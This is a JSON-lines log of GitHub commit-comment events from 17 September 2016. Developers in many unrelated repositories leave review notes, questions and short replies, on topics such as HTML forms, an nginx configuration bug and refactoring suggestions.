{"id":"4578329280","type":"CommitCommentEvent","actor":{"login":"williamboman"},"repo":{"name":"thelounge/lounge"},"payload":{"comment":{"id":19065658,"position":null,"line":null,"path":null,"commit_id":"c090ab065f09b23408790d2d58cbf38ed0442a7b","created_at":"2016-09-17T17:30:08Z","updated_at":"2016-09-17T17:30:08Z","body":"![](http://i.imgur.com/7drHiqr.gif)"}},"created_at":"2016-09-17T17:30:08Z"}
{"id":"4578330767","type":"CommitCommentEvent","actor":{"login":"alfaproject"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19065666,"position":8,"line":2245,"path":"src/main/java/net/pms/dlna/DLNAResource.java","commit_id":"6503be51d6b1094086c2d7f623d256da66bec141","created_at":"2016-09-17T17:31:06Z","updated_at":"2016-09-17T17:31:06Z","body":"Shouldn't it be? `>=`"}},"created_at":"2016-09-17T17:31:06Z"}
{"id":"4578334526","type":"CommitCommentEvent","actor":{"login":"sternenseemann"},"repo":{"name":"svanderbleek/haskellandchill.com"},"payload":{"comment":{"id":19065677,"position":null,"line":null,"path":null,"commit_id":"19526167021050a7c9960bfec0ce738215044ff9","created_at":"2016-09-17T17:33:44Z","updated_at":"2016-09-17T17:33:44Z","body":"whyyyyyy? this went viral on twitter…"}},"created_at":"2016-09-17T17:33:44Z"}
{"id":"4578334792","type":"CommitCommentEvent","actor":{"login":"jvciii"},"repo":{"name":"jvciii/angular2-adal"},"payload":{"comment":{"id":19065678,"position":null,"line":null,"path":null,"commit_id":"4487d0b1e22a26ff4d069922201109888f104247","created_at":"2016-09-17T17:33:54Z","updated_at":"2016-09-17T17:33:54Z","body":"How to acquire token\r\n\r\nlet token = this.adalService.acquireToken(this.secretService.adalConfig.organizationUri);\r\n\t\ttoken().subscribe(t => {\r\n\t\t\t\tconsole.log(t);\r\n\t\t\t},\r\n\t\t\te => {\r\n\t\t\t\tconsole.log(e);\r\n\t\t\t},\r\n\t\t\t() => {\r\n\t\t\t\tconsole.log('done');\r\n\t\t\t});\r\n\t\t\r\n"}},"created_at":"2016-09-17T17:33:54Z"}
{"id":"4578335305","type":"CommitCommentEvent","actor":{"login":"sternenseemann"},"repo":{"name":"svanderbleek/haskellandchill.com"},"payload":{"comment":{"id":19065681,"position":null,"line":null,"path":null,"commit_id":"9246394a566f8a0da7d0c4a397a5ec042618b8e9","created_at":"2016-09-17T17:34:12Z","updated_at":"2016-09-17T17:34:12Z","body":"Whyyyyy? This went viral on twitter."}},"created_at":"2016-09-17T17:34:12Z"}
{"id":"4578336376","type":"CommitCommentEvent","actor":{"login":"gorbiz"},"repo":{"name":"gorbiz/touchart"},"payload":{"comment":{"id":19065688,"position":null,"line":null,"path":null,"commit_id":"b751df48f173405b278e0290e810e59ab41eab0c","created_at":"2016-09-17T17:34:53Z","updated_at":"2016-09-17T17:34:53Z","body":"![screenshot from 2016-09-17 19-11-00](https://cloud.githubusercontent.com/assets/207850/18609902/c98141ce-7d0d-11e6-87af-523739b39591.png)\r\n"}},"created_at":"2016-09-17T17:34:53Z"}
{"id":"4578336378","type":"CommitCommentEvent","actor":{"login":"anijanair"},"repo":{"name":"anijanair/jquery-apps"},"payload":{"comment":{"id":19065689,"position":null,"line":null,"path":null,"commit_id":"ae70b0ab6c496c2a2d3a746ecc34e8025bec7da0","created_at":"2016-09-17T17:34:53Z","updated_at":"2016-09-17T17:34:53Z","body":"This repo contains all the project files for the projects done in the Treehouse jQuery Basics course."}},"created_at":"2016-09-17T17:34:53Z"}
{"id":"4578336515","type":"CommitCommentEvent","actor":{"login":"palvarez89"},"repo":{"name":"Mariocj89/EchaloASuerte"},"payload":{"comment":{"id":19065692,"position":13,"line":239,"path":"echaloasuerte/settings/common.py","commit_id":"8dcc39290fd6a48ef74a166f2eb6e5e137d7836c","created_at":"2016-09-17T17:34:59Z","updated_at":"2016-09-17T17:34:59Z","body":"I guess that setting some default data will help with the tests (now failing) "}},"created_at":"2016-09-17T17:34:59Z"}
{"id":"4578336759","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19065694,"position":7,"line":7,"path":"00-html-css-basics/form.html","commit_id":"a613ac25aafe784ec0cba52eaf84d0617b4ba8b5","created_at":"2016-09-17T17:35:09Z","updated_at":"2016-09-17T17:35:09Z","body":"`<fieldset>` needs to be inside `<form>` in order to have semantic meaning."}},"created_at":"2016-09-17T17:35:09Z"}
{"id":"4578337597","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19065697,"position":10,"line":10,"path":"00-html-css-basics/form.html","commit_id":"a613ac25aafe784ec0cba52eaf84d0617b4ba8b5","created_at":"2016-09-17T17:35:44Z","updated_at":"2016-09-17T17:35:44Z","body":"Nice!"}},"created_at":"2016-09-17T17:35:44Z"}
{"id":"4578339722","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19065705,"position":13,"line":13,"path":"00-html-css-basics/form.html","commit_id":"a613ac25aafe784ec0cba52eaf84d0617b4ba8b5","created_at":"2016-09-17T17:37:13Z","updated_at":"2016-09-17T17:37:13Z","body":"The `for` attribute of the `<label>` tag should be equal to the `id` attribute of the related element to bind them together."}},"created_at":"2016-09-17T17:37:13Z"}
{"id":"4578341626","type":"CommitCommentEvent","actor":{"login":"BgR8"},"repo":{"name":"BgR8/CSSAdres"},"payload":{"comment":{"id":19065712,"position":11,"line":11,"path":"urlcss","commit_id":"b7bc005ae5895186b11d66af7289f35a52d9921e","created_at":"2016-09-17T17:38:31Z","updated_at":"2016-09-17T17:38:31Z","body":"deneme"}},"created_at":"2016-09-17T17:38:31Z"}
{"id":"4578343117","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19065719,"position":14,"line":14,"path":"00-html-css-basics/form.html","commit_id":"a613ac25aafe784ec0cba52eaf84d0617b4ba8b5","created_at":"2016-09-17T17:39:31Z","updated_at":"2016-09-17T17:39:31Z","body":"The `required` attribute  is a boolean attribute, so just need to be there to be equal true. Remove the `=\"\"`."}},"created_at":"2016-09-17T17:39:31Z"}
{"id":"4578345142","type":"CommitCommentEvent","actor":{"login":"melnik909"},"repo":{"name":"MaximMalakhov/Sigma"},"payload":{"comment":{"id":19065727,"position":null,"line":null,"path":null,"commit_id":"a720d493c82848aefadb8eeda61f89a6f4124f76","created_at":"2016-09-17T17:40:48Z","updated_at":"2016-09-17T17:40:48Z","body":"1) выполнил не как я написал\r\n2) в личку мне напиши, как работает этот код"}},"created_at":"2016-09-17T17:40:48Z"}
{"id":"4578346600","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19065738,"position":22,"line":22,"path":"00-html-css-basics/form.html","commit_id":"a613ac25aafe784ec0cba52eaf84d0617b4ba8b5","created_at":"2016-09-17T17:41:43Z","updated_at":"2016-09-17T17:41:43Z","body":"HTML 5 provides to you the input type **email**, so you do not need to add a pattern to validate an email. Update to `type=\"email\"`."}},"created_at":"2016-09-17T17:41:43Z"}
{"id":"4578346986","type":"CommitCommentEvent","actor":{"login":"MichaelHillcox"},"repo":{"name":"callofduty4x/mysql"},"payload":{"comment":{"id":19065739,"position":79,"line":425,"path":"script_functions.c","commit_id":"1407283a228aebfb65977214c3475c1e016c51d5","created_at":"2016-09-17T17:41:59Z","updated_at":"2016-09-17T17:41:59Z","body":"This bit is important. #plzFix"}},"created_at":"2016-09-17T17:41:59Z"}
{"id":"4578348478","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/Pale-Moon"},"payload":{"comment":{"id":19065744,"position":null,"line":null,"path":null,"commit_id":"29df21f59586424c1f0afb1e4fbe017938cfcce7","created_at":"2016-09-17T17:42:55Z","updated_at":"2016-09-17T17:42:55Z","body":"Commit f127b842622d257eeb50a47f4fff2bd478a1b3ee should take care of that."}},"created_at":"2016-09-17T17:42:55Z"}
{"id":"4578352988","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19065758,"position":30,"line":30,"path":"00-html-css-basics/form.html","commit_id":"a613ac25aafe784ec0cba52eaf84d0617b4ba8b5","created_at":"2016-09-17T17:45:49Z","updated_at":"2016-09-17T17:45:49Z","body":"`<select>` does not have an value attribute."}},"created_at":"2016-09-17T17:45:49Z"}
{"id":"4578355253","type":"CommitCommentEvent","actor":{"login":"LifeGold"},"repo":{"name":"Virtual-Universe/Virtual-Dev"},"payload":{"comment":{"id":19065765,"position":null,"line":null,"path":null,"commit_id":"8e347e1ec63c4d5316fb033f8f61b8bddc83900a","created_at":"2016-09-17T17:47:27Z","updated_at":"2016-09-17T17:47:27Z","body":"@emperorstarfinder What do you suggest to use a different version it's good. The only problem is that my official observer Alchemy 4.0.1. Completely rewritten. Now that doesn't work, alas, but with other versions is not an option at all.The search for a solution and the solution to this problem? Since the grid was fully in regard to this problem."}},"created_at":"2016-09-17T17:47:27Z"}
{"id":"4578355490","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19065768,"position":11,"line":11,"path":"00-html-css-basics/form.html","commit_id":"a613ac25aafe784ec0cba52eaf84d0617b4ba8b5","created_at":"2016-09-17T17:47:37Z","updated_at":"2016-09-17T17:47:37Z","body":"Try to avoid using `ul` and `li` to position elements inside your form."}},"created_at":"2016-09-17T17:47:37Z"}
{"id":"4578355766","type":"CommitCommentEvent","actor":{"login":"CucumisSativus"},"repo":{"name":"CucumisSativus/ddd_crm"},"payload":{"comment":{"id":19065772,"position":5,"line":9,"path":"app/models/user.rb","commit_id":"956991e36afea1f0d466e096bf603ecb18bd79dd","created_at":"2016-09-17T17:47:48Z","updated_at":"2016-09-17T17:47:48Z","body":"It's just an university project and many things like this could be refactored. The main purpose of making it was to get familiar with repositories, command objects and so on. By anyway thanks :)"}},"created_at":"2016-09-17T17:47:48Z"}
{"id":"4578356752","type":"CommitCommentEvent","actor":{"login":"shurcooL"},"repo":{"name":"shurcooL/Go-Package-Store"},"payload":{"comment":{"id":19065775,"position":null,"line":null,"path":null,"commit_id":"2e0d1eeea888947f677fc9092434b2bceea4b61d","created_at":"2016-09-17T17:48:27Z","updated_at":"2016-09-17T17:48:27Z","body":"@slimsag Just an idea, I could resolve this issue by vendoring the azul3d.org/semver.v2 package in Go Package Store. What do you think of that?\r\n\r\nAt the same time, based on https://github.com/azul3d/website/issues/11#issuecomment-198624714, that issue has been resolved. So should I be able to just rely on people to go get that package?"}},"created_at":"2016-09-17T17:48:27Z"}
{"id":"4578358435","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19065784,"position":12,"line":10,"path":"00-html-css-basics/media.html","commit_id":"53bf8c87a74fb7ed1ba7bafd42e82c104c5c4af1","created_at":"2016-09-17T17:49:34Z","updated_at":"2016-09-17T17:49:34Z","body":"Use english."}},"created_at":"2016-09-17T17:49:34Z"}
{"id":"4578359361","type":"CommitCommentEvent","actor":{"login":"wlhlm"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19065789,"position":null,"line":null,"path":null,"commit_id":"3cf5d5ebed8c7c20f0da1ec3bc66388f1886b8ec","created_at":"2016-09-17T17:50:13Z","updated_at":"2016-09-17T17:50:13Z","body":"What is the reasoning behind this change?\r\n\r\nAdding and empty `events {}` makes it so that it is not possible to set the `events` directive anywhere in the nix configuration for nginx.\r\n\r\nHere is a snippet of my nginx configuration:\r\n```\r\nservices.nginx.package = pkgs.nginxUnstable;\r\nservices.nginx.config = ''\r\nconfig = ''\r\n  worker_processes auto;\r\n  events {\r\n    worker_connections  1024;\r\n  }\r\n'';\r\n```\r\n\r\nIn this case `nginx.conf` will include `events {}` twice and nginx fails to start:\r\n```\r\nnginx: [emerg] \"events\" directive is duplicate in /nix/store/p7njvyi9i1crp7dl6wrnvi33yvm6fism-nginx.conf:13\r\nnginx.service: Main process exited, code=exited, status=1/FAILURE\r\n```\r\n\r\n- nginx 1.11.3"}},"created_at":"2016-09-17T17:50:13Z"}
{"id":"4578359576","type":"CommitCommentEvent","actor":{"login":"paulproteus"},"repo":{"name":"dwrensha/gitlabhq"},"payload":{"comment":{"id":19065792,"position":1,"line":1,"path":"config/initializers/sandstorm_accept_header.rb","commit_id":"ca55d443a8d2bee77890a91557c90fb733f1f114","created_at":"2016-09-17T17:50:21Z","updated_at":"2016-09-17T17:50:21Z","body":":tada: "}},"created_at":"2016-09-17T17:50:21Z"}
{"id":"4578360019","type":"CommitCommentEvent","actor":{"login":"cthippan"},"repo":{"name":"sagarkrkv/Omega-Dem"},"payload":{"comment":{"id":19065796,"position":null,"line":null,"path":null,"commit_id":"9374fceb3392066e6961a173780d8e857ef88bae","created_at":"2016-09-17T17:50:39Z","updated_at":"2016-09-17T17:50:39Z","body":"install jackson jar file in your project build path."}},"created_at":"2016-09-17T17:50:39Z"}
{"id":"4578360070","type":"CommitCommentEvent","actor":{"login":"excid3"},"repo":{"name":"krsyoung/simple_calendar"},"payload":{"comment":{"id":19065797,"position":21,"line":81,"path":"lib/simple_calendar/calendar.rb","commit_id":"78673ad1975367ca1d28fa91199ca7f1b8a9cb52","created_at":"2016-09-17T17:50:40Z","updated_at":"2016-09-17T17:50:40Z","body":"Do you think if we said something like the following we could remove the if / else and combine these into one block?\r\n\r\n```ruby\r\nevent_end_date = (event.respond_to?(end_attribute) && !event.respond_to?(end_attribute).nil?) ? event.send(end_attribute).to_date : event_start_date\r\n```\r\n\r\nThis would set the end date to the start date, so it would create an array of 1 item later, and we could loop through both cases as if they were the same. I imagine this would make it easier to maintain since all the sorting goes through the same code with no branches. Thoughts?"}},"created_at":"2016-09-17T17:50:40Z"}
{"id":"4578360813","type":"CommitCommentEvent","actor":{"login":"bfpepper"},"repo":{"name":"bfpepper/little-shop"},"payload":{"comment":{"id":19065800,"position":null,"line":null,"path":null,"commit_id":"3d09ede658755ec40199100dd5b6fc6440ef2ad8","created_at":"2016-09-17T17:51:09Z","updated_at":"2016-09-17T17:51:09Z","body":"@calaway did you merge everything from the rubocop fixes to dev?"}},"created_at":"2016-09-17T17:51:09Z"}
{"id":"4578361462","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19065808,"position":18,"line":18,"path":"reader-gtfs/src/main/java/com/graphhopper/reader/gtfs/PtTravelTimeWeighting.java","commit_id":"ab6013e96de27e8ce86a14559a890522cbb64bf1","created_at":"2016-09-17T17:51:32Z","updated_at":"2016-09-17T17:51:32Z","body":"Negative values are probably dangerous here. It is used in all A* implementations to convert the beeline distance into weight. See BeelineWeightApproximator"}},"created_at":"2016-09-17T17:51:32Z"}
{"id":"4578361891","type":"CommitCommentEvent","actor":{"login":"calaway"},"repo":{"name":"bfpepper/little-shop"},"payload":{"comment":{"id":19065810,"position":null,"line":null,"path":null,"commit_id":"3d09ede658755ec40199100dd5b6fc6440ef2ad8","created_at":"2016-09-17T17:51:47Z","updated_at":"2016-09-17T17:51:47Z","body":"Yes, those are now on the development branch."}},"created_at":"2016-09-17T17:51:47Z"}
{"id":"4578362893","type":"CommitCommentEvent","actor":{"login":"Matt-Brigida"},"repo":{"name":"mcwreath31/Allegheny-County-Property-Assessment"},"payload":{"comment":{"id":19065815,"position":6,"line":6,"path":"server.R","commit_id":"1c207df98f73e2b79ccf120eb9ee1400222f8e7b","created_at":"2016-09-17T17:52:25Z","updated_at":"2016-09-17T17:52:25Z","body":"for shinyapps.io change to \r\n`file = \"./Post.csv\"`\r\n`file = \"./Pre.csv\"`\r\nand make sure the files are in the same folder as the app.\r\n\r\n./[file] is a relative file path -- it means 'this folder'.  Can't deploy to shinyapps.io with absolute paths ... \"C://[etc]\""}},"created_at":"2016-09-17T17:52:25Z"}
{"id":"4578364180","type":"CommitCommentEvent","actor":{"login":"Safihre"},"repo":{"name":"sabnzbd/sabnzbd"},"payload":{"comment":{"id":19065822,"position":null,"line":null,"path":null,"commit_id":"1895c9f0ea2d93674343e464817e5f7a7ba38051","created_at":"2016-09-17T17:53:17Z","updated_at":"2016-09-17T17:53:17Z","body":"So tested this a bit and I think the new button should only be shown when there are things to be re-evaluated, not all the time (or disable it). \r\nIf it's only shown/enabled when the results can be updated, maybe it should be called \"Apply filters\".\r\nProbably ```.glyphicon-ok-sign``` or ```.glyphicon-ok-circle``` are better as icon for the button.\r\n"}},"created_at":"2016-09-17T17:53:17Z"}
{"id":"4578364616","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19065823,"position":8,"line":403,"path":"source/gameengine/Ketsji/KX_KetsjiEngine.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-17T17:53:33Z","updated_at":"2016-09-17T17:53:33Z","body":"`Then we have the issue that we have an index but we don't know if we have to add or to remove it.`\r\nI don't very understand you.\r\nI mean that if addrem[x] = true then the joystick x need to be updated.\r\nSCA_PythonJoystick and DEV_Joystick are aligned as:\r\n`gp_PythonJoysticks[index] = new SCA_PythonJoystick(joy, index);`"}},"created_at":"2016-09-17T17:53:33Z"}
{"id":"4578365490","type":"CommitCommentEvent","actor":{"login":"Matt-Brigida"},"repo":{"name":"mcwreath31/Allegheny-County-Property-Assessment"},"payload":{"comment":{"id":19065830,"position":6,"line":6,"path":"ui.r","commit_id":"1c207df98f73e2b79ccf120eb9ee1400222f8e7b","created_at":"2016-09-17T17:54:06Z","updated_at":"2016-09-17T17:54:06Z","body":"Don't think you need to read in the data here in the ui.R.  Just reading in the server.R should work."}},"created_at":"2016-09-17T17:54:06Z"}
{"id":"4578368112","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19065839,"position":28,"line":28,"path":"reader-gtfs/src/test/java/com/graphhopper/GraphHopperGtfsIT.java","commit_id":"2993aba80735144d98d772041633b20f88a49fb8","created_at":"2016-09-17T17:55:47Z","updated_at":"2016-09-17T17:55:47Z","body":"What does NADAV etc mean?"}},"created_at":"2016-09-17T17:55:47Z"}
{"id":"4578368459","type":"CommitCommentEvent","actor":{"login":"patdesorcy"},"repo":{"name":"mjackson/history"},"payload":{"comment":{"id":19065842,"position":null,"line":null,"path":null,"commit_id":"b37e9c868022b2bb7c57efdfdc2252e4447c32da","created_at":"2016-09-17T17:56:01Z","updated_at":"2016-09-17T17:56:01Z","body":"Comment on b37e9c8"}},"created_at":"2016-09-17T17:56:01Z"}
{"id":"4578370396","type":"CommitCommentEvent","actor":{"login":"ftrrtf"},"repo":{"name":"ftrrtf/jwt"},"payload":{"comment":{"id":19065844,"position":28,"line":95,"path":"src/Serialization/Compact.php","commit_id":"fafb029be03f3abc5077903ff65caf695511f93a","created_at":"2016-09-17T17:57:21Z","updated_at":"2016-09-17T17:57:21Z","body":"100%, поняття не маю чому тоді так написав)"}},"created_at":"2016-09-17T17:57:21Z"}
{"id":"4578371070","type":"CommitCommentEvent","actor":{"login":"patdesorcy"},"repo":{"name":"mjackson/history"},"payload":{"comment":{"id":19065845,"position":null,"line":null,"path":null,"commit_id":"b37e9c868022b2bb7c57efdfdc2252e4447c32da","created_at":"2016-09-17T17:57:46Z","updated_at":"2016-09-17T17:57:46Z","body":"Github.com.  b37e9c8"}},"created_at":"2016-09-17T17:57:46Z"}
{"id":"4578372715","type":"CommitCommentEvent","actor":{"login":"Abdisalan"},"repo":{"name":"Abdisalan/tufts-meals"},"payload":{"comment":{"id":19065848,"position":null,"line":null,"path":null,"commit_id":"d0efa4f5e3f3258735f4aa148921914de653323f","created_at":"2016-09-17T17:58:57Z","updated_at":"2016-09-17T17:58:57Z","body":"This is how it looks\r\n<img width=\"762\" alt=\"screen shot 2016-09-17 at 1 45 53 pm\" src=\"https://cloud.githubusercontent.com/assets/6256142/18610027/d9eeb9ee-7cde-11e6-9f05-9b37330dfbd4.png\">\r\n"}},"created_at":"2016-09-17T17:58:57Z"}
{"id":"4578376989","type":"CommitCommentEvent","actor":{"login":"smarterclayton"},"repo":{"name":"marun/origin"},"payload":{"comment":{"id":19065864,"position":4,"line":75,"path":"test/cmd/admin.sh","commit_id":"148de23ea2826d4e260e4bad33e041564b32463e","created_at":"2016-09-17T18:01:30Z","updated_at":"2016-09-17T18:01:30Z","body":"What is this test testing?  Shouldn't it verify that the field is actually set via a better output check?"}},"created_at":"2016-09-17T18:01:30Z"}
{"id":"4578378376","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19065873,"position":null,"line":null,"path":null,"commit_id":"f28efa19713977a61395b19fec1fe501aeee4c0e","created_at":"2016-09-17T18:02:25Z","updated_at":"2016-09-17T18:02:25Z","body":"@dhylands : Please update teensy port to use this common rule.\r\n"}},"created_at":"2016-09-17T18:02:25Z"}
{"id":"4578380312","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"sindresorhus/pify"},"payload":{"comment":{"id":19065876,"position":null,"line":null,"path":null,"commit_id":"550f5ec692368eb86f2ae22a23fe64612de9c1c5","created_at":"2016-09-17T18:03:03Z","updated_at":"2016-09-17T18:03:03Z","body":"Can you do this tweak in master too?"}},"created_at":"2016-09-17T18:03:03Z"}
{"id":"4578380499","type":"CommitCommentEvent","actor":{"login":"nilsonfm"},"repo":{"name":"nilsonfm/hweb"},"payload":{"comment":{"id":19065877,"position":null,"line":null,"path":null,"commit_id":"9caf020efa37279bba11b4170b517d1c02ebaa70","created_at":"2016-09-17T18:03:10Z","updated_at":"2016-09-17T18:03:10Z","body":"1"}},"created_at":"2016-09-17T18:03:10Z"}
{"id":"4578380616","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19065878,"position":8,"line":403,"path":"source/gameengine/Ketsji/KX_KetsjiEngine.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-17T18:03:15Z","updated_at":"2016-09-17T18:03:15Z","body":"Ok, i understand a bit more, addrem is not true if the joystick is added OR remove but when it is added. In this case using a short instead of a boll can help."}},"created_at":"2016-09-17T18:03:15Z"}
{"id":"4578381103","type":"CommitCommentEvent","actor":{"login":"T-Maxxx"},"repo":{"name":"callofduty4x/mysql"},"payload":{"comment":{"id":19065881,"position":79,"line":425,"path":"script_functions.c","commit_id":"1407283a228aebfb65977214c3475c1e016c51d5","created_at":"2016-09-17T18:03:35Z","updated_at":"2016-09-17T18:03:35Z","body":"https://github.com/callofduty4x/mysql/pull/1#issuecomment-247784634"}},"created_at":"2016-09-17T18:03:35Z"}
{"id":"4578381504","type":"CommitCommentEvent","actor":{"login":"leonardoaraujosantos"},"repo":{"name":"leonardoaraujosantos/Matlab_LLVM_Frontend"},"payload":{"comment":{"id":19065888,"position":null,"line":null,"path":null,"commit_id":"c3430ba7c834c83c5ac5e694ef9c330e109f2684","created_at":"2016-09-17T18:03:53Z","updated_at":"2016-09-17T18:03:53Z","body":"[TutorialFlexBison.pdf](https://github.com/leonardoaraujosantos/Matlab_LLVM_Frontend/files/478303/TutorialFlexBison.pdf)\r\n"}},"created_at":"2016-09-17T18:03:53Z"}
{"id":"4578383164","type":"CommitCommentEvent","actor":{"login":"xamgore"},"repo":{"name":"ragunathjawahar/kaffeine"},"payload":{"comment":{"id":19065897,"position":54,"line":72,"path":"README.md","commit_id":"52a29f008922620f35adc6bc678b53339a756522","created_at":"2016-09-17T18:05:02Z","updated_at":"2016-09-17T18:05:02Z","body":"You call `showShort…` function but in the example above the toast has `LENGTH_LONG` property. Are you sure that kotlin version is correct?"}},"created_at":"2016-09-17T18:05:02Z"}
{"id":"4578383217","type":"CommitCommentEvent","actor":{"login":"HumanSprout"},"repo":{"name":"HumanSprout/udemynode"},"payload":{"comment":{"id":19065899,"position":null,"line":null,"path":null,"commit_id":"effc8dad4a13edbf7b2778e519ac3933aa5dd010","created_at":"2016-09-17T18:05:05Z","updated_at":"2016-09-17T18:05:05Z","body":"no it's not, it's 55"}},"created_at":"2016-09-17T18:05:05Z"}
{"id":"4578383896","type":"CommitCommentEvent","actor":{"login":"HumanSprout"},"repo":{"name":"HumanSprout/udemynode"},"payload":{"comment":{"id":19065901,"position":null,"line":null,"path":null,"commit_id":"5cfb727b4d2d86f5c8ef4d2fdd8e941ae5d79170","created_at":"2016-09-17T18:05:28Z","updated_at":"2016-09-17T18:05:28Z","body":"no it's not, it's 55"}},"created_at":"2016-09-17T18:05:28Z"}
{"id":"4578386598","type":"CommitCommentEvent","actor":{"login":"the7winds"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19065911,"position":15,"line":15,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-17T18:07:14Z","updated_at":"2016-09-17T18:07:14Z","body":"@LDVSOFT, я только что заглянул в презенташку:\r\n![screenshot from 2016-09-17 21-06-55](https://cloud.githubusercontent.com/assets/10619465/18610066/b2cc2c70-7d1a-11e6-8f5b-cabed83d8872.png)\r\n"}},"created_at":"2016-09-17T18:07:14Z"}
{"id":"4578387244","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19065915,"position":null,"line":null,"path":null,"commit_id":"4b4700c6291466e1f0b7ea5c5f83d9d8dc378205","created_at":"2016-09-17T18:07:42Z","updated_at":"2016-09-17T18:07:42Z","body":"This should be on master."}},"created_at":"2016-09-17T18:07:42Z"}
{"id":"4578387525","type":"CommitCommentEvent","actor":{"login":"MichaelHillcox"},"repo":{"name":"callofduty4x/mysql"},"payload":{"comment":{"id":19065917,"position":79,"line":425,"path":"script_functions.c","commit_id":"1407283a228aebfb65977214c3475c1e016c51d5","created_at":"2016-09-17T18:07:53Z","updated_at":"2016-09-17T18:07:53Z","body":"https://github.com/callofduty4x/mysql/pull/1#issuecomment-247794466"}},"created_at":"2016-09-17T18:07:53Z"}
{"id":"4578387623","type":"CommitCommentEvent","actor":{"login":"the7winds"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19065918,"position":5,"line":5,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-17T18:07:57Z","updated_at":"2016-09-17T18:07:57Z","body":"Ну странно, если он отрицательный"}},"created_at":"2016-09-17T18:07:57Z"}
{"id":"4578390508","type":"CommitCommentEvent","actor":{"login":"JuanCrg90"},"repo":{"name":"FranciscoRam/ej.java.complex.AM2016"},"payload":{"comment":{"id":19065926,"position":42,"line":42,"path":"src/complex/Complex.java","commit_id":"f028e1aacb6cc778044635898edf98b6cd2d8ff1","created_at":"2016-09-17T18:09:49Z","updated_at":"2016-09-17T18:09:49Z","body":"Cuida los estilos en el código ese `a*b`es ilegible"}},"created_at":"2016-09-17T18:09:49Z"}
{"id":"4578391397","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"sindresorhus/pify"},"payload":{"comment":{"id":19065930,"position":20,"line":56,"path":"index.js","commit_id":"e46e3c9e834c74424da24060f5e0a806f0171e00","created_at":"2016-09-17T18:10:17Z","updated_at":"2016-09-17T18:10:17Z","body":"I think it would be better to call it normally and instead pass `thisArg` as an argument here, as it's not used directly in the called function. `argumentList` can just be passed as an array. When `opts.excludeMain === true` you could just use `Reflect.apply` for default behavior."}},"created_at":"2016-09-17T18:10:17Z"}
{"id":"4578392786","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"sindresorhus/pify"},"payload":{"comment":{"id":19065933,"position":null,"line":null,"path":null,"commit_id":"e46e3c9e834c74424da24060f5e0a806f0171e00","created_at":"2016-09-17T18:11:05Z","updated_at":"2016-09-17T18:11:05Z","body":"You can use the `spread` operator here: https://github.com/sindresorhus/pify/commit/e46e3c9e834c74424da24060f5e0a806f0171e00#diff-168726dbe96b3ce427e7fedce31bb0bcR17"}},"created_at":"2016-09-17T18:11:05Z"}
{"id":"4578394633","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19065935,"position":218,"line":758,"path":"lib/elixir/lib/calendar.ex","commit_id":"e50735ff2a7c16cc7705d8fa59af906e986c19f7","created_at":"2016-09-17T18:12:03Z","updated_at":"2016-09-17T18:12:03Z","body":"> to_unix and to_gregorian are equally specific to one calendar. The only\n> difference in that regard is the start of the epoch.\n>\n\nRight. However gregorian days mark the year 0, which is probably not\nspecific to the Gregorian calendar. So I was proposing something more\nagnostic such as days_from_year_zero or something with similar notation.\nAll other operations today we have are related to a fixed epoch.\n\n> Another thing I realized is that this is doing a difference between two\n> dates or two times. So maybe we should rather implement difference for all\n> three of them with precision as argument?\n>\n> I'm not sure I understand this. Rather than what?\n>\nInstead of providing a function that does conversion to/from an epoch so we\ncan compute a time interval, maybe we could provide the functions that\ndirectly does the computation. For example, for loading data from PG, I\nneed something like this:\n>\n>\n    NaiveDateTime.add N[2000-01-01 00:00:00], seconds_from_db\n\nIt doesn't need to be a \"rather\" though, we could\nimplement both epoch conversions AND add/diff operations.\n\nTks for all the replies as usual <3\n\n\n-- \n\n\n*José Valimwww.plataformatec.com.br\n<http://www.plataformatec.com.br/>Founder and Director of R&D*\n"}},"created_at":"2016-09-17T18:12:03Z"}
